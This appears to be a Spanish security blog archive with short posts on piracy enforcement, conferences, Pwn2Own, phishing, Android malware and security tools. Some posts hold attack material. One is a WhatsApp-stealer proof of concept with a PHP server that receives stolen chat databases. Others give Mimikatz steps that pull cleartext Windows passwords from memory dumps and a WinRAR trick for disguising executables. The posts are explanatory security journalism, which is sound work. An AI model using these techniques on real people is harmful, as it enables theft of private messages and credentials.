Ofensiva contra Rojadirecta y las webs que enlazan partidos de fútbol en streaming

El 23 de marzo se jugó el partido Real Madrid - F.C. Barcelona sobre el césped del Bernabéu... y mientras, desde dos datacenters (uno fuera de España), se libraba otra batalla contra miles de sitios web que ofrecían ilegalmente el encuentro en streaming. Consiguieron bloquear miles de páginas y el resultado fue que muchos usuarios que intentaban ver el partido de forma gratuita no pudieron hacerlo, si no la mayoría.

Pero es sólo el comienzo de la guerra... La televisiones de pago se han fijado como objetivo eliminar las páginas web piratas que les suponen pérdidas de millones de euros y cientos de puestos de trabajo. Y entre ellas destaca especialmente Rojadirecta, creada por Igor Seoane (del que no se conoce una foto suya ni su paradero) y de la que dicen que aglutina el 9% del tráfico total de Internet en España.

Lo que más llama la atención es que, mientras que aterriza la nueva Ley de Propiedad Intelectual y a la espera de que algunas sentencias en Europa allanen el camino, PRISA y Mediapro junto a la Liga Profesional han decidido pasar a la ofensiva y utilizan empresas especializadas como Iproded y un programa bautizado como Hermes, formado por abogados, administrativos e informáticos, para entorpecer la señal por medios legales generando una media de 500 peticiones de bloqueo diarias contra servidores, proxies, operadores, registradores de dominio, proveedores, blogs y cualquier elemento que intervenga. Incluso se comenta que se han llevado acabo ataques de DDoS, algo con un matiz no tan "legal" y que Iproded se ha apresurado a negar...


Fuentes:
- Madrid-Barça contra el fútbol pirata
- Guerra sucia: Prisa y Mediapro financian ataques 'hacker' contra Rojadirecta
- Qué árbitro más malo: Mediapro y Prisa se unen para acabar con Rojadirecta

Jornada de seguridad informática HighSecCON III

HighSecCON es un evento que organizan desde HighSec al que poco a poco va asistiendo y conociendo más gente. El próximo viernes 4 de abril tendrá lugar la tercera edición que cuenta con ponentes reconocidos a nivel internacional que prometen charlas muy interesantes:

Sesión 1: 16:00-17:50
Sesión 2: 18:10-20:00
  • Simon Roses “ Analizando binarios e ingeniería inversa.“
  • Jaime Sanchez  “From Kernel Space to WhatsApp Nightmare“
El evento es completamente gratuito y sin animo de lucro, donde cuyo único fin es seguir difundiendo conocimiento, experiencias y que los asistentes puedan conocer gente dentro del mundo de la seguridad. Ademas, el evento esta muy enfocado a difundir estos conocimientos dentro del mundo universitario, por ello será celebrado en Salon de Actos (EPS-UAM) de la Escuela Politécnica de la Universidad Autónoma de Madrid (), que cuenta con una capacidad de más de 600 personas.

Todos los que queráis asistir solo tenéis que registraros en  https://www.ticketea.com/highseccon/.

Toda la información sobre el evento esta aquí: http://highseccon.es/

El abc para desproteger un Excel con contraseña

Desde que soy consultor de seguridad una de las herramientas que más utilizo de mi arsenal de hacking es... Excel ٩(͡๏̯͡๏)۶ ... y cómo este blog va de lo que va... pues vamos a mostraros un pequeño "how-to" para romper las principales protecciones de nuestras hojas de cálculo favoritas.

Cifrar con contraseña

Algo muy común es proteger el acceso total al fichero con una contraseña:


Sangre, soledad y muerte: el rostro maligno de la tecnología

Queridos lectores de Hackplayers, buen día/noche. Para escribir ciertos temas con un matiz específico, es necesario poseer un defecto de MIERDA… innato e inherente a la naturaleza de uno mismo, y a prueba de cualquier clase de crítica buena o mala y también a prueba de golpes. Bien a bien, no se cuál es ese defecto, solo lo tienes y es un poco retorcido; aunque tal vez sea más bien un propósito y no un defecto: el de llegar a ser lo suficientemente duro para escribir alguna cosa, de la que luego no sientas pena hasta los huesos y por supuesto cargues con todo y tu hipocresía. Y no importa si es una historia corta o larga, un post, un artículo, una reseña, una opinión, lo que fuera, siempre y cuando sea lo más demoledora posible. No es muy difícil ser implacable en este mundo de la tecnología, y menos cuando se ha crecido muy pegado al culto del underground, y todo lo que ello conlleva. 
 
Por ejemplo; hay cosas que a la gente no se le puede contar, hay otras que deberían contárseles y no se les cuentan. Pero por otra parte, hay cosas que se cuentan y se saben perfectamente y muchos nos arrepentimos de haberlas escuchado, pensado, creído, o temido, y de esta forma las enterramos en el subsuelo de la memoria, donde nunca hay por qué rascarle, hasta que se vuelven indiferentes a nosotros, y ajenas a nuestro mundo. Tratamos de restarle la verdadera importancia que tienen. Porque lo más fácil, lo más cómodo y lo de mejor gusto, es dejar en el olvido todo lo que no afecta nuestras vidas…directamente.
 
Todavía no termino mi ejemplo:
 
 Y...¿cuáles son los problemas de su vida cotidiana?

Una historia de vida en el otro lado del planeta: África subsahariana, todos los jodidos días.
 
Un niño congoleño que no es ficticio, naturalmente un niño desnutrido, famélico de tan sólo 8 años, que vive en unas condiciones increíblemente precarias, se halla en su vida diaria, pero no como todos los niños que conocemos. Ni siquiera un niño de orfanato, un niño mendigo, un niño que está solo en la calle,  el niño que ustedes quieran con una vida no muy afortunada ante nuestros ojos, tiene comparación alguna con el “estilo de vida” de nuestro niño congoleño. 
Cada mísero día, ha de levantarse antes de ponerse el sol, por supuesto sin un rico desayuno de leche y miel, huevos y avena, carne y jugo; cereales, y se ve completamente obligado a unirse a un grupo de infantes como él.

Plugin mimikatz offline para Volatility

Hace tiempo estuvimos probando un extensión de Mimikatz para WinDBG con la que podíamos extraer las contraseñas de Windows en claro desde un volcado de memoria, es decir, de modo totalmente off-line. Ahora podemos hacerlo también directamente desde Volatility gracias a un plugin que ha creado Francesco Picasso de Zena Forensics.

Para probarlo empezaremos obteniendo un volcado de memoria de la máquina de la víctima. En esta ocasión lo haremos mediante Belkasoft Love RAM Capturer, una pequeña herramienta gratuita para obtener el contenido completo de la memoria volatil que incluso incluye medidas contra sistemas anti-debugging y anti-dumping.

 

Ahora actualizamos el repositorio de Zena Forensic, al que bautizaron hotoloti (git clone https://code.google.com/p/hotoloti/) o descargamos directamente el script en Python mimikatz.py y después lo copiamos en la carpeta de plugins de Volatility.


Probablemente al ejecutar Volatility con este plugin tendrás que instalar algún módulo adicional de Python, en mi caso pycrypto, construct y six.


Finalmente lo ejecutamos y... voilà!

D:\Python27\Scripts>vol.py --profile=Win7SP0x64 -f d:\hotoloti\20140326.mem mimikatz
Volatility Foundation Volatility Framework 2.3.1
WARNING : volatility.obj      : NoneObject as string: Invalid offset 4526360 for
 dereferencing Buffer as String
WARNING : volatility.plugins.mimikatz: [Credential:decrypt_epwd] unicode decode
error
Module   User             Domain           Password

-------- ---------------- ---------------- -------------------------------------
---
wdigest  vmotos           DOMINIO         contraseña_en_claro

wdigest  PC_CASA_3$      DOMINIO         22d38e7bd5c740e0aa7...f4f436cb11bb123165

Falsificación de extensiones de ficheros en WinRAR (0-day)

Hace poco se mostraba en un blog israelí una vulnerabilidad 0-day en la versión 4.20 de WinRAR (otras versiones podrían verse también afectadas) con la que es posible engañar muy fácilmente a un usuario para que ejecute por ejemplo... un troyano. Además es sumamente sencilla de explotar...

Para nuestra PoC empezaremos creando un simple vbs 'pruebas.vbs':


MsgBox("PWNED! jajaj")

y lo comprimiremos creando el fichero 'pruebas.zip':

 
Cuando tratamos de comprimir el archivo en "formato ZIP" con WinRAR, la estructura de archivos es la estándar pero WinRAR añade varias propiedades adicionales, como un segundo nombre de archivo:



¿Qué pasa si modificamos ese nombre con nuestro editor hexadecimal por algo más "sugerente" como 'tetazas.jpg'?:

Demonizando Latch para proteger archivos con dos llaves

Antes de nada querría dar las gracias a Helloween por tomarle prestada un trozo de su portada del magnífico álbum "Keeper of seven keys" para ilustrar esta entrada....

Imaginemos que tenemos un servidor dispuesto para nuestros usuarios. Tenemos cierto archivo o carpeta que tiene que estar disponible para dos usuarios en concreto; el cual no puede ser leído o modificado sin el permiso de ambos.

Sería genial que ambos usuarios pudiesen tener el control sobre este hecho, como si se tratase de un cofre el cual necesita dos llaves (podrían ser más) para ser abierto, sin ni siquiera tener un acceso físico a la máquina, es decir,  que puedan decidirlo por control remoto desde su smartphone y así tener el control total sobre el acceso a dicho archivo o carpeta...

Esta situación es posible si miramos las posibilidades que nos brinda LATCH (de paso les agradezco a 11paths el juguetico que me hace pasar unas horas muy entretenido) y hacemos un apañejo, o chapucilla a la espera de que implementen algo parecido (que seguro que lo han pensado).

Pues bueno vamos a ver como lo hacemos y al tiempo aprenderemos a hacer nuestros propios demonios en Linux.

Cierra la lista Full Disclosure :(

otro paso más para el fin de la transparencia...
Hola amigos, hoy es un día en parte triste por el anuncio de que Full Disclosure ha sido suspendida. 

Full Disclosure ha sido una de las mejores listas de seguridad moderadas donde se descubrían vulnerabilidades y se debatían y divulgaban temas de seguridad informática. Hospedada y patrocinada por Secunia, fue fundada el 9 de julio de 2002 por Len Rose y era administrada por John Cartwright. Precisamente éste último ha anunciado hoy su cese del servicio. Aquí les dejo mi traducción con sus razones:

"Administrivia: El Fin
From: John Cartwright
Date: Wed, 19 Mar 2014 10:30:15 +0000


Hola,

Cuando Len y yo creamos la lista Full-Disclosure allá por julio de 2002, sabíamos que en el camino íbamos a encontrar bastantes problemas legales.
Teníamos razón. Hasta la fecha hemos tenido todo tipo de peticiones para borrar cosas, solicitudes para no borrar cosas, y una variedad de amenazas legales tanto válidas como no. Sin embargo, siempre asumí que lo que nos haría cambiar sería una petición de eliminación de información a gran escala de algún fabricante o alguna otra excepción.

Nunca me imaginé que la solicitud pudiera venir de un investigador dentro de la 'comunidad' en sí (y utilizo esa palabra de forma poco precisa en tiempos modernos). Pero hoy, después de haber pasado una buena cantidad de tiempo tratando las quejas de un individuo en particular (del que no diré su nombre) me di cuenta de que ya ha terminado. La lista ha tenido su parte justa de trolling, flooding, furry porn, falsos exploits y ataques DoS en los últimos años, pero ninguna de estas cosas afectaron realmente la integridad de la propia lista.
Sin embargo, pasar un hacha virtual a los archivos de la lista por el capricho de un individuo no sienta bien. Ese 'uno de los nuestros' haría
socavar los esfuerzos de los últimos 12 años y es realmente la gota que colma el vaso.

No estoy dispuesto a luchar esta lucha por más tiempo. Es cada vez más duro operar un foro abierto en el clima legal actual, y mucho más un
uno relacionado con la seguridad . No hay más honor entre los hackers. No existe una verdadera comunidad . Hay poco skill valioso. El juego de la seguridad está cada vez más regulado . Esto es toda una señal de lo que vendrá , y una reflexión sobre el triste estado de una industria que nunca debería haberse convertido en una industria.

Suspendo el servicio por tiempo indefinido. Gracias por participar.

Saludos,
- John
"

Phishing Scam: una táctica de atracción que conmociona al mundo cibernético

El phishing es un ciberdelito reconocido hoy en día e incluso Google no está a salvo de este fraude. Phishing es típicamente un correo electrónico fraudulento que se hace pasar por legítimo para recopilar información confidencial de los usuarios. Los spammers utilizan técnicas avanzadas para conseguir que los usuarios hagan clic en los enlaces de phishing mientras que revisan su correo. Recientemente, los investigadores de Symantec han encontrado un fraude de phishing sofisticado dirigido a los usuarios de Google Docs y Google Drive.


Los hackers utilizan la palabra "documentos" en el asunto de un correo electrónico y piden al usuario comprobar un importante documento en Google Docs con un clic en el enlace incluido. El enlace va a una página de inicio de sesión falsa de Google Docs, donde el usuario tiene que proporcionar un nombre de usuario y contraseña.

La página falsa está alojada en el servidor de Google y se cifra con SSL para hacer que parezca más real. El fraude fue hecho haciendo una carpeta en Google Drive firmada como pública, subiendo un archivo, y utiliza la función de vista previa de Google Drive en Docs. Tan pronto como los usuarios introduzcan información de inicio de sesión sobre dicha página y pulsen el botón "sign-in", se ejecutará un script PHP en un servidor web comprometido que recogerá las credenciales del usuario.

Blackhash: audita passwords sin hashes!

Imagina que necesitas realizar una auditoría de las contraseñas de tu sistema y tienes que facilitar los hashes a un equipo auditor externo. Este equipo debe determinar que usuarios están usando contraseñas débiles y normalmente lo hace mediante ataques de diccionario con herramientas de cracking como John the Ripper o Hashcat. 

Pero, ¿te tienes que fiar completamente del equipo auditor? ¿y si pierden los hashes o los copian y distribuyen sin tu consentimiento?

Ya no es necesario que seas tan confiado, con la herramienta Blackhash es posible aplicar un filtro Bloom a los hashes de las contraseñas de tal manera que el auditor sólo recibirá una ristra de unos y ceros.

e14a04e980097ede599cac94358e1028 -> 00000100000001000100001

Y ahora seguro que te estarás preguntando qué demonios es un filtro Bloom... pues se trata de una estructura de datos probabilística creada en 1970 por Burton Howard Bloom que básicamente calcula el hash de la contraseña con varias funciones para obtener un vector de bits. Luego por cada palabra del diccionario se vuelven a calcular las mismas funciones hash y se compara el vector de bits: si no coincide definitivamente no es la contraseña, si coincide PUEDE que sea... XD

Lo que nos dejó Pwn2Own 2014


Los días 12 y 13 de marzo se celebró una nueva edición del Pwn2Own, el  concurso donde expertos en seguridad  descubren  vulnerabilidades para los principales navegadores en diferentes sistemas operativos y plugins. Los participantes se llevan importantes premios económicos.

Como muchos ya sabéis, Pwn2Own es el evento anual que desde 2007 aglutina a los mejores investigadores de seguridad y donde se ponen a prueba los navegadores web más populares en diferentes sistemas operativos, así como aplicaciones populares : Adobe Reader, Flash y Java.....

 
Pwn2Own, que este año a tenido lugar en la ciudad canadiense de Vancouver, está patrocinado por la empresa Zero Day Initiative (ZDI) de HP, una compañía que se encarga de poner en contacto a investigadores de seguridad y compañías de software para garantizar una publicación coordinada de vulnerabilidades.    
 
En esta edición las metas fueron:

Navegadores:
Google Chrome en Windows 8.1 x64: $ 100,000 USD
Microsoft Internet Explorer 11 en Windows 8.1 x64: $ 100,000 USD
Mozilla Firefox 8.1 en Windows x64: $ 50,000 USD
Apple Safari en OS X Mavericks: $ 65,000 USD

Plug-ins:
Adobe Reader que se ejecuta en Internet Explorer 11 en Windows 8.1 x64: $ 75,000 USD
Adobe Flash en Internet Explorer 11 en Windows 8.1 x64: $ 75,000 USD
Oracle Java que se ejecuta en Internet Explorer 11 en Windows 8.1 x64 (requiere derivación de click-through): $ 30,000 USD

Comprometiendo sistemas Android (2ª parte)

La semana pasada leímos la siguiente noticia y "leo" textualmente:

Hispasec: "Hace unos días, Metasploit añadió un módulo para aprovechar una vulnerabilidad en el sistema operativo para móviles Android. El exploit, desarrollado por los investigadores Joe Vennix (@joevennix) y Josh Drake
(@jduck), permite obtener el
control del sistema con tan solo visitar una página web manipulada especialmente.
La vulnerabilidad afectaría en principio a las versiones anteriores a la 4.2 (Jelly Bean), publicada a finales de octubre de 2012. No obstante, para observar el comportamiento de la vulnerabilidad sobre la miríada de versiones parcheadas por los fabricantes dejaron colgada una prueba de concepto abierta a todo aquel que quisiera (y se fiara) comprobar si su sistema era o no vulnerable."

Como es normal llamó mi atención y me puse manos a la obra ya que me viene al pelo para seguir con esta serie de posts...

Después de unas horas "cuzarreando" pude comprobar que la noticia es realmente inquietante... ver como hay una vulnerabilidad crítica que lleva tres meses sin que los fabricantes le hayan puesto remedio me pone los pelos de punta, olisqueando por la red vimos que tan solo unas pocas versiones tienen solucionado el bug.

Veamos!!....

QwikMark: una pequeña pero útil herramienta de benchmarking para tu PC

¿Alguna vez has querido comparar la velocidad relativa de 2 o más PCs? ¿O tal vez estas a punto de reemplazar tú disco duro por un SSD y deseas comprobar que el nuevo dispositivo es realmente más rápido? Si es así, necesitarás algún programa de benchmarking (evaluación comparativa) de PC , y uno bastante interesante, pequeño y sencillo es Qwikmark.

Qwikmark ocupa sólo 0.08 MB (sí, en torno a 80 KB) y lo puedes obtener en http://www.vtaskstudio.com/support.php (tercer elemento de la página ). Es gratis, portátil y libre de virus según Web of Trust y VirusTotal. Basta con descargarlo y ejecutarlo, y luego probar cada uno de sus cuatro tests. Podrás conocer rápidamente la velocidad de la CPU en megahertz y megaflops, así como la velocidad de la memoria RAM y del disco duro al transferir datos.


Fuente: A Really Simple PC Benchmarking Utility

El CCI crea un juego de mesa sobre ciberseguridad (yet another cyber WTF)

El Centro de Ciberseguridad Industrial español ha creado un juego de mesa de C*berseguridad (sí habéis oído bien), donde cada jugador asumirá el papel de un investigador que debe utilizar sus facultades de deducción para descubrir dónde, cómo, por qué y quién ha provocado un incidente que ha paralizado una planta industrial.

Este juego llamado Ciber Sospecha pretende servir como una herramienta profesional de concienciación y formación en cib3rseguridad para Proveedores, Administradores y Usuarios de los Sistemas de Operación industrial y los Sistemas de Información Corporativos, pero ha sido especialmente diseñado para sensibilizar a los Directivos de las organizaciones.

Que queréis que os diga, o no veo a un director o consejero jugando a este juego en casa con sus hijos, pero quizás tendría buena cabida en un taller o seminario de esos que les gusta organizar a los departamentos de RRHH (una partida suele durar entre 30 y 50 minutos y permite de 3 a 8 jugadores).

El juego estará disponible el próximo 25 de marzo, aunque ya puede reservarse. Contiene un tablero de 60x60 cm, un manual de usuario, notas de investigación, las tarjetas, las piezas de juego, dados y un sobre confidencial.

El objetivo es ser el primero en descubrir, a través de la deducción y la eliminación, en un tiempo máximo establecido por los jugadores de la partida, a la persona que ha causado el incidente de c1berseguridad que paralizó el proceso automatizado de una planta industrial, y también en cual de las ubicaciones de la planta o el cib*respacio se originó, así como qué vulnerabilidades y amenazas eran las empleadas.

Cuanto menos nos ha parecido curioso, así que acá os dejamos el enlace:

http://www.cci-es.org/web/cci/detalle-evento/-/journal_content/56/10694/58103

Aplicación Android para robar y leer chats de WhatsApp en Android (PoC)

¿Es posible subir y leer los chats de Whatsapp de un smartphone desde otra aplicación de Android? Por supuesto que sí. Sólo necesitamos que la aplicación maliciosa haya sido instalada aceptando los permisos para leer la tarjeta SD del dispositivo (android.permission.READ_EXTERNAL_STORAGE).

Hace unos meses se publicó en algunos foros una guía paso a paso para montar nuestro propio Whatsapp Stealer y ahora Bas Bosschert ha publicado una PoC con unas pocas modificaciones.

Para empezar con la prueba de concepto (y ojo que digo PoC que nos conocemos ;)) tenemos que publicar en nuestro webserver un php para subir las bases de datos de Whatsapp:

<?php
// Upload script to upload Whatsapp database
// This script is for testing purposes only.
 
$uploaddir = "/tmp/whatsapp/";
 
if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "<br>";
  }
else
  {
  echo "Upload: " . $_FILES["file"]["name"] . "<br>";
  echo "Type: " . $_FILES["file"]["type"] . "<br>";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];
 
  $uploadfile = $uploaddir . $_SERVER['REMOTE_ADDR'] . "." . basename($_FILES['file']['name']);
  move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
  }
?>
 
<html><head><title>Shoo.. nothing here</title></head><body><form method="post" enctype="multipart/form-data"><input type="file" name="file" id="file"><input type="submit" value="Submit"></form></body></html>

Después debemos configurar nuestro php.ini para subir ficheros grandes:

...
file_uploads = On
post_max_size = 32M
upload_max_filesize = 32M

Dendroid: troyaniza cualquier app de Google Play por menos de 300 euros

La comunidad anda algo revuelta porque en algunos foros underground un tal 'Soccer' ha ofrecido una herramienta para Android que por sólo 300 dólares (pagables a través de monedas no rastreables como Bitcoin) troyaniza cualquier app en sencillos pasos, incluye soporte 24x7, un avanzado panel de control en PHP y sobretodo permite evadir el bouncer de Google Play.
Conocido como Dendroid, este nuevo RAT descubierto inicialmente por Symantec se vende como un "APK Binder" que puede utilizar cualquier aplicación original de Android e incorporar su propio malware, es decir, la carga útil del troyano. Después de distribuir la aplicación infectada, los clientes del RAT de Dendroid pueden controlar la propagación de la infección a través de herramientas basadas en la web.



Los dispositivos android infectados se convierten en zombies controlados remotamente por el autor, lo que permite un acceso prácticamente ilimitado a las fotos, los datos y los mensajes en el dispositivo. Dendroid proporciona también acceso completo a la cámara y el micrófono, y puede realizar llamadas o escuchar las conversaciones telefónicas de un usuario o ver los mensajes de texto.

Según la firma de seguridad Lookout, "entre sus numerosas características, Dendroid cuenta con algunos códigos relativamente simples - pero inusuales - de detección de anti-emulación que ayudan a evadir la detección por parte del Bouncer, el sistema de detección anti-malware de Google para su tienda oficial."


Parece que este troyano tiene cierta relación con la anterior herramienta AndroRAT ya que en algunos mensajes de asistencia se han remitido mensajes relacionados con el anterior malware. ¿Te apetece analizarlo? descarga la muestra (Tim Strazzere): contagiominidump.blogspot.com.es/2014/03/dendroid-android-spyware.html

Fuentes:
- Dendroid RAT: the Next Stage of Android Malware Evolution
- New Android "RAT" infects Google Play apps, turning phones into spyware zombies
- Saboteurs slip Dendroid RAT into Google Play
- New crimeware tool Dendroid makes it easier to create Android malware, researchers warn
- New Dendroid Malware for Android Providing Complete Control over the Smartphone

Recomendaciones: Torrescrack

Hoy vamos a recomendaros un sitio donde podréis encontrar temas interesantes en el área de la ingeniería inversa con algunos artículos en el blog que nos comparte Alejandro Torres también conocido como Torrescrack:


En el blog de Torrescrack vas a encontrar diferentes enlaces a tutoriales con diversa información sobre temas de reversing como son: análisis de malware, curso gratuito (modo tutorial) de desarrollo de malware, cracking, iniciación a retos de cracking y próximamente artículos de exploiting.

Un buen blog para practicar tus habilidades de reversing y aprender más del tema, leer sobre algunas investigaciones interesantes que irán publicando sobre la marcha.

También podéis seguirlo desde Twitter o Facebook:


https://www.facebook.com/yo.torrescrack
https://twitter.com/TorresCrack248

Empieza la #Rooted2014 !

Mañana comienzan las conferencias de la quinta edición de la Rooted CON que este año tiene como principales novedades su traslado al Hotel Auditórium Madrid y la participación de algunos ponentes internacionales que impartirán charlas con traducción simultánea (para quien la necesite claro).

Ya se han impartido los RootedLabs y hay ganadores de la RootedArena (enhorabuena w0pr, dcua y pADAwan). Está todo preparado, los patrocinadores, el RootedPanel, el Bootcamp de Corelan y hasta un concierto de A Medias en la Sala LASAL... ¡nos vemos en la Rooted!

bWAPP: una aplicación web extremadamente insegura para practicar

bWAPP, o una aplicación web con errores (buggy web application), es una aplicación web deliberadamente insegura.


bWAPP ayuda a entusiastas de la seguridad, desarrolladores y estudiantes a descubrir y prevenir vulnerabilidades web. bWAPP prepara para llevar a cabo pruebas de intrusión y proyectos de hacking ético
con éxito.

Pero ¿qué hace bWAPP tan único? Bueno, tiene más de 60 bugs web! Cubre todas las principales vulnerabilidades web conocidas, incluyendo todos los riesgos del proyecto OWASP Top 10.

bWAPP es una aplicación PHP que utiliza una base de datos MySQL. Puede ser alojada en Linux y Windows utilizando Apache/IIS y MySQL. Se puede instalar con WAMP o XAMPP.

Otra posibilidad es descargar bee-box, una VM personalizada pre-instalada con bWAPP.

Este proyecto es parte del proyecto ITSEC GAMES. ITSEC GAMES es un enfoque divertido para la educación de TI de seguridad. Seguridad informática, hacking ético, la formación y la diversión ... todo mezclado.

Web del proyecto: http://sourceforge.net/projects/bwapp/